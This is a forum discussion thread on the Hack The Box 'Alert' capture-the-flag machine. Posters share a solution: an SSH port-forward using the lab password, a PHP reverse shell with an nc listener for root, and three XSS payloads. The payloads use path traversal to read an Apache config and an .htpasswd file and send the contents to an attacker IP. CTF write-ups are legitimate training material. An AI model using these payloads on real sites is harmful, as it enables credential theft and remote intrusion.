Hackthebox - Alert [Discussion] [HTB]

macavitysworld · November 24, 2024, 5:20am

Let’s discuss Alert from hackthebox

celikd · November 25, 2024, 7:59pm

To get user flag:

ssh -L 8080:127.0.0.1:8080 albert@alert.htb
Password: manchesterunited

To get Root Flag:
Add a php rev shell in /opt/website-monitor/config

then nc -lnvp <Your Listening Port>
then visit http://127.0.0.1:8080/config/revshell.php

Voila ! You got Root !

csa · November 26, 2024, 3:37am

How were you able to get the user and pass? Was it via xss?

celikd · November 26, 2024, 7:26pm

First:

<script> fetch("http://alert.htb/")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Second:

<script> fetch("http://alert.htb/messages.php?file=../../../../../../../etc/ apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Third:

<script> fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/ statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

After you click send (make sure you do this 3 times ), you will get URL encoded responses from the python server.

For the first one, upload the file and then click View Markdown

I just posted writeup you can check🥲